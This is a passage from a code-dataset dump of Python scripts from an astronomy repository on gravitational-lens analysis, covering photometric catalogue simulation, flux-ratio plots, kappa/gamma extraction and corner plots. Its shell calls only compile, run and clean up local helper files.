len(data[K][(data[K]>=22.5) & (data[K]<22.75)])))\n#dataout[Kerr_o][(data[K]>=22.75) & (data[K]<23)] = positive(np.random.normal(np.sqrt(0.10**2+zpterr**2), 0.015, len(data[K][(data[K]>=22.75) & (data[K]<23)])))\n#dataout[Kerr_o][(data[K]>=23) & (data[K]<23.25)] = positive(np.random.normal(np.sqrt(0.12**2+zpterr**2), 0.022, len(data[K][(data[K]>=23) & (data[K]<23.25)])))\n#dataout[Kerr_o][data[K]>=23.25] = positive(np.random.normal(np.sqrt(0.13**2+zpterr**2), 0.025, len(data[K][data[K]>=23.25])))\n\n#dataout = np.delete(dataout,np.where(dataout[i_o] > 24),axis=1)\n\n#dataout[u_o] = np.random.normal(dataout[u_o], dataout[uerr_o])\n#dataout[g_o] = np.random.normal(dataout[g_o], dataout[gerr_o])\n#dataout[r_o] = np.random.normal(dataout[r_o], dataout[rerr_o])\n#dataout[i_o] = np.random.normal(dataout[i_o], dataout[ierr_o])\n#dataout[z_o] = np.random.normal(dataout[z_o], dataout[zerr_o])\n#dataout[J_o] = np.random.normal(dataout[J_o], dataout[Jerr_o])\n#dataout[H_o] = np.random.normal(dataout[H_o], dataout[Herr_o])\n#dataout[K_o] = np.random.normal(dataout[K_o], dataout[Kerr_o])\n\n# eliminate objects that are i> 24 in both the original iorig and the randomized i\n#dataout = np.delete(dataout,np.where((dataout[i_o] > 24) & (dataout[iorig_o] > 24)),axis=1)\n\n# applying 1-sigma detection limits including their uncertainty; these are final values I used as input for lephare for the real lens field; all values are in 
AB\n#dataout[u_o][dataout[u_o]>=np.random.normal(27.39, 0.05, len(dataout[u_o]))] = 99.0 # WFI2033\n#dataout[g_o][dataout[g_o]>=np.random.normal(25.48, 0.15, len(dataout[g_o]))] = 99.0 # WFI2033\n#dataout[r_o][dataout[r_o]>=np.random.normal(25.55, 0.12, len(dataout[r_o]))] = 99.0 # WFI2033\n#dataout[g_o][dataout[g_o]>=np.random.normal(25.09+1.75, 0.07, len(dataout[g_o]))] = 99.0 # J1206\n#dataout[r_o][dataout[r_o]>=np.random.normal(24.88+1.75, 0.04, len(dataout[r_o]))] = 99.0 # J1206\n#dataout[z_o][dataout[z_o]>=np.random.normal(24.64, 0.45, len(dataout[z_o]))] = 99.0 # WFI2033\n#dataout[J_o][dataout[J_o]>=np.random.normal(23.21, 0.12, len(dataout[J_o]))] = 99.0 # WFI2033\n#dataout[H_o][dataout[H_o]>=np.random.normal(22.60, 0.08, len(dataout[H_o]))] = 99.0 # WFI2033\n#dataout[K_o][dataout[K_o]>=np.random.normal(22.50, 0.04, len(dataout[K_o]))] = 99.0 # WFI2033\n#dataout[K_o][dataout[K_o]>=np.random.normal(20.63+1.75+1.85, 0.07, len(dataout[K_o]))] = 99.0 # added conversion to AB; # J1206\n#dataout[uerr_o][dataout[u_o]==99.0] = 27.39 # WFI2033\n#dataout[gerr_o][dataout[g_o]==99.0] = 25.09+1.75 # J1206\n#dataout[rerr_o][dataout[r_o]==99.0] = 24.88+1.75 # J1206\n#dataout[zerr_o][dataout[z_o]==99.0] = 24.64 # WFI2033\n#dataout[Jerr_o][dataout[J_o]==99.0] = 23.21 # WFI2033\n#dataout[Herr_o][dataout[H_o]==99.0] = 22.60 # WFI2033\n#dataout[Kerr_o][dataout[K_o]==99.0] = 20.63+1.75+1.85 # J1206\n\n#head = \"GalID \\t z_spec \\t pos_0[rad] \\t pos_1[rad] \\t M_Halo[M_sol/h] \\t M_Stellar[M_sol/h] \\t mag_SDSS_iorig \\t mag_SDSS_u \\t mag_SDSS_uerr \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_SDSS_z \\t mag_SDSS_zerr \\t mag_J \\t mag_Jerr \\t mag_H \\t mag_Herr \\t mag_K \\t mag_Kerr\" NOT USING THIS ONE BECAUSE THE SPECIAL CHARACTERS ARE NOT RECOGNIZED PROPERLY BY BPZ\n#head = \"GalID \\t z_spec \\t pos0 \\t pos_1 \\t M_Halo \\t M_Stellar \\t mag_SDSS_iorig \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_K \\t mag_Kerr\"\n#np.savetxt(fileout_ugrizJHK,dataout.T,header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.3e \\t %.3e \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n\nprint filein + ' Done!'\n" }, { "alpha_fraction": 0.5225880742073059, "alphanum_fraction": 0.6619448661804199, "avg_line_length": 60.203125, "blob_id": "eab850c58f00c56171ef5c7a78a30a2d7a0679cc", "content_id": "9feb411606f4eb465fa6d2612068e1fcedfad0c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7836, "license_type": "no_license", "max_line_length": 130, "num_lines": 128, "path": "/python/plot_utilities/plot_fluxratio.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Simple code for scatter plot without error bars. 
Computes bias, scatter and fraction of outliers\n##########################\n\n#from matplotlib.colors import LogNorm\n#import scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\nplt.clf()\n\n#A_125_1 = 1.476526e+06\n#B_125_1 = 2.233584e+05\n#C_125_1 = 1.344782e+05\n#D_125_1 = 7.739332e+04\n#A_125_2 = 1.436465e+06\n#B_125_2 = 2.133077e+05\n#C_125_2 = 1.474414e+05\n#D_125_2 = 6.260539e+04\n#A_160_1 = 3.499114e+06\n#B_160_1 = 3.805276e+05\n#C_160_1 = 2.701676e+05\n#D_160_1 = 1.401271e+05\n#A_160_2 = 3.157662e+06\n#B_160_2 = 3.534201e+05\n#C_160_2 = 2.970849e+05\n#D_160_2 = 1.389452e+05\n\nA_125_1 = 10 ** ((-18.18 + 26.23)/2.5)\nB_125_1 = 10 ** ((-20.28 + 26.23)/2.5)\nC_125_1 = 10 ** ((-20.86 + 26.23)/2.5)\nD_125_1 = 10 ** ((-21.45 + 26.23)/2.5)\nA_125_2 = 10 ** ((-18.26 + 26.23)/2.5)\nB_125_2 = 10 ** ((-20.31 + 26.23)/2.5)\nC_125_2 = 10 ** ((-20.69 + 26.23)/2.5)\nD_125_2 = 10 ** ((-21.74 + 26.23)/2.5)\nA_160_1 = 10 ** ((-17.53 + 25.95)/2.5)\nB_160_1 = 10 ** ((-20.05 + 25.95)/2.5)\nC_160_1 = 10 ** ((-20.44 + 25.95)/2.5)\nD_160_1 = 10 ** ((-21.09 + 25.95)/2.5)\nA_160_2 = 10 ** ((-17.75 + 25.95)/2.5)\nB_160_2 = 10 ** ((-20.09 + 25.95)/2.5)\nC_160_2 = 10 ** ((-20.26 + 25.95)/2.5)\nD_160_2 = 10 ** ((-21.11 + 25.95)/2.5)\n\nmuAnopert,muBnopert,muCnopert,muDnopert = np.loadtxt(\"pointSIEgamma_einstmagniftime_out_mcmc.dat\",usecols=[14,10,6,2],unpack=True)\nmuApert,muBpert,muCpert,muDpert = np.loadtxt(\"point1pertSIEgamma_einstmagniftime_out_mcmc.dat\",usecols=[14,10,6,2],unpack=True)\n\nplt.hist(np.abs(muCnopert/muAnopert),bins=100,normed=True,label='predicted C/A w/o GX',color='r',histtype='stepfilled')\nplt.hist(np.abs(muCnopert/muBnopert),bins=100,normed=True,label='predicted C/B w/o GX',color='b',histtype='stepfilled')\nplt.hist(np.abs(muCnopert/muDnopert),bins=100,normed=True,label='predicted C/D w/o GX',color='g',histtype='stepfilled')\nplt.hist(np.abs(muCpert/muApert),bins=100,normed=True,label='predicted C/A w/ GX',color='r',histtype='step')\nplt.hist(np.abs(muCpert/muBpert),bins=100,normed=True,label='predicted C/B w/ GX',color='b',histtype='step')\nplt.hist(np.abs(muCpert/muDpert),bins=100,normed=True,label='predicted C/D w/ GX',color='g',histtype='step')\n\nplt.axvline(C_125_1/A_125_1, 0, 1, linestyle='--', linewidth=3, color='r', label='F125 C/A visit 1')\nplt.axvline(C_125_1/B_125_1, 0, 1, linestyle='--', linewidth=3, color='b', label='F125 C/B visit 1')\nplt.axvline(C_125_1/D_125_1, 0, 1, linestyle='--', linewidth=3, color='g', label='F125 C/D visit 1')\nplt.axvline(C_160_1/A_160_1, 0, 1, linestyle='--', linewidth=1, color='r', label='F160 C/A visit 1')\nplt.axvline(C_160_1/B_160_1, 0, 1, linestyle='--', linewidth=1, color='b', label='F160 C/B visit 1')\nplt.axvline(C_160_1/D_160_1, 0, 1, linestyle='--', linewidth=1, color='g', label='F160 C/D visit 1')\nplt.axvline(C_125_2/A_125_2, 0, 1, linestyle='-', linewidth=3, color='r', label='F125 C/A visit 2')\nplt.axvline(C_125_2/B_125_2, 0, 1, linestyle='-', linewidth=3, color='b', label='F125 C/B visit 2')\nplt.axvline(C_125_2/D_125_2, 0, 1, linestyle='-', linewidth=3, color='g', label='F125 C/D visit 2')\nplt.axvline(C_160_2/A_160_2, 0, 1, linestyle='-', linewidth=1, color='r', label='F160 C/A visit 2')\nplt.axvline(C_160_2/B_160_2, 0, 1, linestyle='-', linewidth=1, color='b', label='F160 C/B visit 2')\nplt.axvline(C_160_2/D_160_2, 0, 1, linestyle='-', linewidth=1, color='g', label='F160 C/D visit 2')\n\nplt.legend(prop={'size': 8}) # font size\nplt.tick_params(labelsize=14)\nplt.xlabel('Flux ratio', 
fontsize=16)\nplt.ylabel('Normalized distribution', fontsize=16)\nplt.savefig('fluxratiosC.png')\n\nplt.clf()\n\nplt.hist(np.abs(muBnopert/muAnopert),bins=100,normed=True,label='predicted B/A w/o GX',color='r',histtype='stepfilled')\nplt.hist(np.abs(muBnopert/muCnopert),bins=100,normed=True,label='predicted B/C w/o GX',color='b',histtype='stepfilled')\nplt.hist(np.abs(muBnopert/muDnopert),bins=100,normed=True,label='predicted B/D w/o GX',color='g',histtype='stepfilled')\nplt.hist(np.abs(muBpert/muApert),bins=100,normed=True,label='predicted B/A w/ GX',color='r',histtype='step')\nplt.hist(np.abs(muBpert/muCpert),bins=100,normed=True,label='predicted B/C w/ GX',color='b',histtype='step')\nplt.hist(np.abs(muBpert/muDpert),bins=100,normed=True,label='predicted B/D w/ GX',color='g',histtype='step')\n\nplt.axvline(B_125_1/A_125_1, 0, 1, linestyle='--', linewidth=3, color='r', label='F125 B/A visit 1')\nplt.axvline(B_125_1/C_125_1, 0, 1, linestyle='--', linewidth=3, color='b', label='F125 B/C visit 1')\nplt.axvline(B_125_1/D_125_1, 0, 1, linestyle='--', linewidth=3, color='g', label='F125 B/D visit 1')\nplt.axvline(B_160_1/A_160_1, 0, 1, linestyle='--', linewidth=1, color='r', label='F160 B/A visit 1')\nplt.axvline(B_160_1/C_160_1, 0, 1, linestyle='--', linewidth=1, color='b', label='F160 B/C visit 1')\nplt.axvline(B_160_1/D_160_1, 0, 1, linestyle='--', linewidth=1, color='g', label='F160 B/D visit 1')\nplt.axvline(B_125_2/A_125_2, 0, 1, linestyle='-', linewidth=3, color='r', label='F125 B/A visit 2')\nplt.axvline(B_125_2/C_125_2, 0, 1, linestyle='-', linewidth=3, color='b', label='F125 B/C visit 2')\nplt.axvline(B_125_2/D_125_2, 0, 1, linestyle='-', linewidth=3, color='g', label='F125 B/D visit 2')\nplt.axvline(B_160_2/A_160_2, 0, 1, linestyle='-', linewidth=1, color='r', label='F160 B/A visit 2')\nplt.axvline(B_160_2/C_160_2, 0, 1, linestyle='-', linewidth=1, color='b', label='F160 B/C visit 2')\nplt.axvline(B_160_2/D_160_2, 0, 1, linestyle='-', linewidth=1, color='g', label='F160 B/D visit 2')\n\nplt.legend(prop={'size': 8}) # font size\nplt.tick_params(labelsize=14)\nplt.xlabel('Flux ratio', fontsize=16)\nplt.ylabel('Normalized distribution', fontsize=16)\nplt.savefig('fluxratiosB.png')\n\nplt.clf()\n\nplt.hist(np.abs(muDnopert/muAnopert),bins=100,normed=True,label='predicted D/A w/o GX',color='r',histtype='stepfilled')\nplt.hist(np.abs(muDnopert/muBnopert),bins=100,normed=True,label='predicted D/B w/o GX',color='b',histtype='stepfilled')\nplt.hist(np.abs(muDnopert/muCnopert),bins=100,normed=True,label='predicted D/C w/o GX',color='g',histtype='stepfilled')\nplt.hist(np.abs(muDpert/muApert),bins=100,normed=True,label='predicted D/A w/ GX',color='r',histtype='step')\nplt.hist(np.abs(muDpert/muBpert),bins=100,normed=True,label='predicted D/B w/ GX',color='b',histtype='step')\nplt.hist(np.abs(muDpert/muCpert),bins=100,normed=True,label='predicted D/C w/ GX',color='g',histtype='step')\n\nplt.axvline(D_125_1/A_125_1, 0, 1, linestyle='--', linewidth=3, color='r', label='F125 D/A visit 1')\nplt.axvline(D_125_1/B_125_1, 0, 1, linestyle='--', linewidth=3, color='b', label='F125 D/B visit 1')\nplt.axvline(D_125_1/C_125_1, 0, 1, linestyle='--', linewidth=3, color='g', label='F125 D/C visit 1')\nplt.axvline(D_160_1/A_160_1, 0, 1, linestyle='--', linewidth=1, color='r', label='F160 D/A visit 1')\nplt.axvline(D_160_1/B_160_1, 0, 1, linestyle='--', linewidth=1, color='b', label='F160 D/B visit 1')\nplt.axvline(D_160_1/C_160_1, 0, 1, linestyle='--', linewidth=1, color='g', label='F160 D/C visit 
1')\nplt.axvline(D_125_2/A_125_2, 0, 1, linestyle='-', linewidth=3, color='r', label='F125 D/A visit 2')\nplt.axvline(D_125_2/B_125_2, 0, 1, linestyle='-', linewidth=3, color='b', label='F125 D/B visit 2')\nplt.axvline(D_125_2/C_125_2, 0, 1, linestyle='-', linewidth=3, color='g', label='F125 D/C visit 2')\nplt.axvline(D_160_2/A_160_2, 0, 1, linestyle='-', linewidth=1, color='r', label='F160 D/A visit 2')\nplt.axvline(D_160_2/B_160_2, 0, 1, linestyle='-', linewidth=1, color='b', label='F160 D/B visit 2')\nplt.axvline(D_160_2/C_160_2, 0, 1, linestyle='-', linewidth=1, color='g', label='F160 D/C visit 2')\n\nplt.legend(prop={'size': 8}) # font size\nplt.tick_params(labelsize=14)\nplt.xlabel('Flux ratio', fontsize=16)\nplt.ylabel('Normalized distribution', fontsize=16)\nplt.savefig('fluxratiosD.png')\n\n\n" }, { "alpha_fraction": 0.6462311744689941, "alphanum_fraction": 0.6864321827888489, "avg_line_length": 44.227272033691406, "blob_id": "422b6247cc00c1b88021502c4aad62c5f76cc695", "content_id": "d98b76a1f306af40ef0b7f50b562f7bd55ba7d82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 995, "license_type": "no_license", "max_line_length": 168, "num_lines": 22, "path": "/python/catalogue_utilities/limfluxrad.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code computes the histogram of the SExtractor FLUX_RADIUS parameter and fits it with a Gaussian. This is useful for the star-galaxy classification employed by CFHTLenS\n\nimport numpy as np\nimport pylab as plt\nfrom scipy.optimize import leastsq\nplt.clf()\nmag,rad=np.loadtxt(\"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazy.cat\",usecols=(4,6),unpack=True)\nrad = rad[(mag<21) & (rad<6)]\nfitfunc = lambda p, x: p[0]*np.exp(-0.5*((x-p[1])/p[2])**2)\nerrfunc = lambda p, x, y: (y - fitfunc(p, x))\ninit = [20.0, 2.5, 1]\nbins = 50\nydata,xdatabin = np.histogram(rad,bins)\nbin = xdatabin[1]-xdatabin[0]\nxdata = np.linspace(xdatabin[0]+bin/2.0,xdatabin[len(xdatabin)-1]-bin/2.0,len(xdatabin)-1)\nout = leastsq( errfunc, init, args=(xdata, ydata))\nc = out[0]\nc[2] = np.abs(c[2]) # the fitted width can come out negative, since the model depends only on its square\nplt.plot(xdata, fitfunc(c, xdata))\nplt.hist(rad, bins)\nplt.title(r'$A = %.3f\\ \\mu = %.3f\\ \\sigma = %.3f\\ $' %(c[0],c[1],c[2]));\nplt.show()\n" }, { "alpha_fraction": 0.6599099040031433, "alphanum_fraction": 0.6869369149208069, "avg_line_length": 30.714284896850586, "blob_id": "c07d5e9bfa9383fb68b570d2d8e053b28a04318", "content_id": "0545d74084de4027003a9cd4c593e513c2e6409f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 444, "license_type": "no_license", "max_line_length": 133, "num_lines": 14, "path": "/python/modeling_utilities/optimize.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# minimize a function computed by another code\n\nimport subprocess\nimport numpy as np\nfrom scipy.optimize import minimize\n\ndef func(x):\n s = subprocess.check_output([\"python\", \"/Users/cerusu/GITHUB/zMstarPDF/python/modeling_utilities/func.py\", str(x[0]), str(x[1])])\n print str(x[0]), str(x[1])\n return float(s)\n\nx0 = np.array([0.1,0.1])\nres = minimize(func, x0, method='nelder-mead', options={'xtol': 1e-8, 'disp': True})\nprint(res.x)\n" }, { "alpha_fraction": 0.5588458776473999, "alphanum_fraction": 0.6613515615463257, "avg_line_length": 53.875, "blob_id": "6bb200f1e80fd
"22161a59b1854ea732d98e75aee376de9b6d4eb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1317, "license_type": "no_license", "max_line_length": 122, "num_lines": 24, "path": "/python/catalogue_utilities/inferkappasimbiasscript2.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# script the execution of inferkappasimbias.py to vary with a specific parameter\n\nimport sys\nimport os\n#import numpy as np\n\nfile = \"/lfs08/rusucs/code/inferkappasimbias.py\"\nfor i in range(20): # 8\n constr_gal_meds45 = 0.6 + i * 0.2\n with open(file, 'r') as f:\n code = f.readlines()\n code[138 - 1] = \"constr_gal_meds45 = %s \\n\" % constr_gal_meds45\n code[139 - 1] = \"constrwidth_gal_meds_inf45 = %s \\n\" % (constr_gal_meds45 - 0.05)\n code[140 - 1] = \"constrwidth_gal_meds_sup45 = %s \\n\" % (constr_gal_meds45 + 0.05)\n code[142 - 1] = \"constr_gal_meds120 = %s \\n\" % constr_gal_meds45\n code[143 - 1] = \"constrwidth_gal_meds_inf120 = %s \\n\" % (constr_gal_meds45 - 0.05)\n code[144 - 1] = \"constrwidth_gal_meds_sup120 = %s \\n\" % (constr_gal_meds45 + 0.05)\n with open(file, 'w') as f:\n f.writelines(code)\n f.close()\n #os.system(\"python inferkappasimbias.py WFI2033 -1.0 -1.0 empty notremovegroups 5 22.5 measured med 45_gal\")\n os.system(\"python inferkappasimbias.py WFI2033 -1.0 -1.0 empty notremovegroups 5 22.5 measured med 120_gal 120_gamma\")\n #os.system(\"python inferkappasimbias.py WFI2033 -1.0 -1.0 empty notremovegroups 5 23.5 measured med 45_gal\")\n #os.system(\"python inferkappasimbias.py WFI2033 -1.0 -1.0 empty notremovegroups 5 23.5 measured med 120_gal\")\n" }, { "alpha_fraction": 0.7411764860153198, "alphanum_fraction": 0.774117648601532, "avg_line_length": 27.33333396911621, "blob_id": "be407c2b7258438ddb1d0a2cf93343c75ffd7b08", "content_id": "00b0c9a9eccd6a27225e599018a77fa1ac07508e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 425, "license_type": "no_license", "max_line_length": 88, "num_lines": 15, "path": "/python/image_utilities/headers.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Header manupulation\n\nfrom astropy.io import fits\n\nimage0 = fits.open('VISTAmatch_Ks_small.fits')\ndata0 = image0[0].data\nhead0 = image0[0].header\n\nimage1 = fits.open('lensfixcompanion_correctPSFshowlens_subtractK.fits')\n\n#h['NITER'] = (niter, 'number of Richardson Lucy iterations')\n\nimage1_corr = image1\nimage1_corr[0].header = head0\nimage1_corr.writeto('lensfixcompanion_correctPSFshowlens_subtractK.fits',overwrite=True)\n" }, { "alpha_fraction": 0.5649819374084473, "alphanum_fraction": 0.612364649772644, "avg_line_length": 30.657142639160156, "blob_id": "662996f3f16604c6c8a09892c1548f60344fe925", "content_id": "ee1c7c3bb6b19fe9f96a9999b2b1912a16631ee3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2216, "license_type": "no_license", "max_line_length": 156, "num_lines": 70, "path": "/python/catalogue_utilities/kappagammaforChihFan.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, July 8 2018\n# run as e.g.: python /lfs08/rusucs/code/kappamed_insertstarsnobeta.py GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nimport time\n\ndef pause():\n programPause = raw_input(\"Press the <ENTER> key to continue...\") # 
use for debugging\n\ndef readbinary(replacestr):\n replace = plane + replacestr\n os.system(\"sed \\\"11s/.*/ const char kappa_file_name[] = \\\\\\\"\\%s\\\\\\\";/\\\" readKappaBinary.c > readKappaBinary_%s.c_\" % (replace,plane))\n os.system(\"sed \\\"35s/.*/ fpt = fopen (\\\\\\\"kappa_values_%s.dat\\\\\\\", \\\\\\\"w\\\\\\\");/\\\" readKappaBinary_%s.c_ > readKappaBinary_%s.c\" % (plane,plane,plane))\n os.system(\"rm -f readKappaBinary_%s.c_\" % plane)\n os.system(\"gcc readKappaBinary_%s.c -o compiled_%s.out\" % (plane,plane))\n os.system(\"./compiled_%s.out\" % plane)\n os.system(\"rm -f readKappaBinary_%s.c\" % plane)\n os.system(\"rm -f compiled_%s.out\" % plane)\n\nstart_time = time.time()\n\nplane = str(sys.argv[1])\n\n#if lens == \"B1608\":\n# z_s = 1.39\n# pln = 37 # MS simulation plane\n#if lens == \"HE0435\":\n# z_s = 1.69\n# z_l = 0.455\n#if lens == \"WFI2033\":\n# z_s = 1.66\n# z_l = 0.66\n#if lens == \"HE1104\":\n# z_s = 2.32\n#pln = 30 & 31\n#if lens == \"RX1131\":\n# z_s = 0.66\n##pln = 45 & 46\n#if lens == \"J1206\":\n# z_s = 1.79\n# pln = 34\n#if lens == \"PG1115\":\n# z_s = 1.72\npln = 34\n\nrootkappaplanes = \"/lfs08/rusucs/kappaplanes/\"\n\nstart_readkappa = time.time()\n\nif str(pln) in plane:\n os.chdir(rootkappaplanes)\n readbinary(\".kappa\")\n kappa = np.loadtxt(\"kappa_values_%s.dat\" % plane, usecols = [1], unpack=True)\n readbinary(\".gamma_1\")\n gamma1 = np.loadtxt(\"kappa_values_%s.dat\" % plane, usecols = [1], unpack=True)\n readbinary(\".gamma_2\")\n gamma2 = np.loadtxt(\"kappa_values_%s.dat\" % plane, usecols = [1], unpack=True)\n kappagamma = np.c_[kappa,np.sqrt(gamma1 ** 2 + gamma2 ** 2)]\n os.system(\"rm -f kappa_values_%s.dat\" % plane)\n np.savetxt(\"kappagamma_values_%s.dat\" % plane,kappagamma,fmt=\"%e %e\")\nelse: sys.exit('Wrong MS plane for this lens!!!')\n\nprint(\" Field done in --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6293706297874451, "alphanum_fraction": 0.7086247205734253, "avg_line_length": 21.578947067260742, "blob_id": "19b4c16081e84e59a2b66a8f7ceb455a9569b363", "content_id": "dc8b41a9ae6a0ced6c4a0f0b650dbd8abb8d5226", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 429, "license_type": "no_license", "max_line_length": 44, "num_lines": 19, "path": "/python/plot_utilities/nierenberg2019chi.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Testing Figure 4 in Nierenberg et al. 
2019\n\n#import matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n#import scipy as sp\n#from scipy.stats import norm\nimport numpy as np\n\nplt.clf()\nx = np.random.normal(0, 1, 1000)\nchi2 = ((0-x)**2)/(1**2)\nargchi2sort = np.argsort(chi2)\nf = (argchi2sort + 1)/1000.0\nchi2sort = chi2[argchi2sort]\nplt.xscale('log')\nplt.xlim([0.01,10])\nplt.scatter(chi2sort,np.sort(f))\nplt.show()\n" }, { "alpha_fraction": 0.6238394975662231, "alphanum_fraction": 0.7202755212783813, "avg_line_length": 55.59321975708008, "blob_id": "d9373c3c2d42c62791bfc8a50657674bf96600a8", "content_id": "b22b8a5847c4d88e2ac099241855cae36f29d1f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3339, "license_type": "no_license", "max_line_length": 262, "num_lines": 59, "path": "/python/plot_utilities/densityplot.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# produces density plot\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nimport scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\nimport corner\n\nfont = 10\nticksize = 10\n\nimport sys\nfile = str(sys.argv[1])\nplt.clf()\nfig = plt.figure(figsize=(10,12))\n#fig, axes = plt.subplots(nrows=2, ncols=2)\n\nfile1 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_22.5_med_increments4_1000_4_emptymsk_shearwithoutprior_test_kappagamma.cat\"\nfile2 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_22.5_med_increments4_1000_4_emptymsk_shearwithoutprior_test_kappagamma_fiducialzeta.cat\"\nfile3 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments4_1000_4_4_4_emptymsk_shearwithoutprior_test_kappagamma.cat\"\nfile4 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments4_1000_4_4_4_emptymsk_shearwithoutprior_test_kappagamma_fiducialzeta.cat\"\nfile5 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_gamma_45_oneoverr_22.5_med_increments4_1000_4_emptymsk_shearwithoutprior_test_kappagamma.cat\"\nfile6 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_gamma_45_oneoverr_22.5_med_increments4_1000_4_emptymsk_shearwithoutprior_test_kappagamma_fiducialzeta.cat\"\nax1 = fig.add_subplot(1,1,1)\nax1.set_aspect(1)\nif file == \"1\": x, y = np.loadtxt(file1, usecols=(0, 1), unpack=True)\nif file == \"2\": x, y = np.loadtxt(file2, usecols=(0, 1), unpack=True)\nif file == \"3\": x, y = np.loadtxt(file3, usecols=(0, 1), unpack=True)\nif file == \"4\": x, y = np.loadtxt(file4, usecols=(0, 1), unpack=True)\nif file == \"5\": x, y = np.loadtxt(file5, usecols=(0, 1), unpack=True)\nif file == \"6\": x, y = np.loadtxt(file6, usecols=(0, 1), unpack=True)\nxlim = 0.10\nxlim_ = -0.05\nylim = 0.05\nylim_ = 0.03\nx_ = x[(x >= xlim_) & (x <= xlim) & (y >= ylim_) & (y <= ylim)]\ny_ = y[(x >= xlim_) & (x <= xlim) & (y >= ylim_) & (y <= ylim)]\nx = x_\ny = y_\n#hist2d(x, y, bins=[100, 100], 
norm=LogNorm())\n#plt.xticks(rotation='vertical',size = ticksize)\n#plt.yticks(size = ticksize)\n#colorbar()\n\nfigure = corner.corner(np.c_[x,y], labels=[\"$\\kappa$\",\"$\\gamma$\"],quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\n\n#plt.xlabel('$\\kappa$', fontsize=font)\n#plt.ylabel('$\\gamma$', fontsize=font)\n#plt.xlim(xlim_, xlim)\n#plt.ylim(ylim_, ylim)\nif file == \"1\": figure.savefig('../WFI2033/MSkapparesults/1.png' , dpi=250)\nif file == \"2\": figure.savefig('../WFI2033/MSkapparesults/2.png' , dpi=250)\nif file == \"3\": figure.savefig('../WFI2033/MSkapparesults/3.png' , dpi=250)\nif file == \"4\": figure.savefig('../WFI2033/MSkapparesults/4.png' , dpi=250)\nif file == \"5\": figure.savefig('../WFI2033/MSkapparesults/5.png' , dpi=250)\nif file == \"6\": figure.savefig('../WFI2033/MSkapparesults/6.png' , dpi=250)\n" }, { "alpha_fraction": 0.44161707162857056, "alphanum_fraction": 0.505027711391449, "avg_line_length": 49.76041793823242, "blob_id": "e18a9571ee6f462f66e43b690d78e8113d593e8f", "content_id": "81f1026f282c3aeb1629268ef07b8b9207edd125", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4873, "license_type": "no_license", "max_line_length": 377, "num_lines": 96, "path": "/python/catalogue_utilities/plotkappabar.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the output statistics produced by plotkappacompletestatistics.py/plotkappabiascompletestatistics.py in order to plot bars. Run without arguments. Make sure the uncomment the appropriate ax.set_ylim, ylabel and savefig lines\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappa/\"\ndata = np.genfromtxt('%smedstd.dat' % 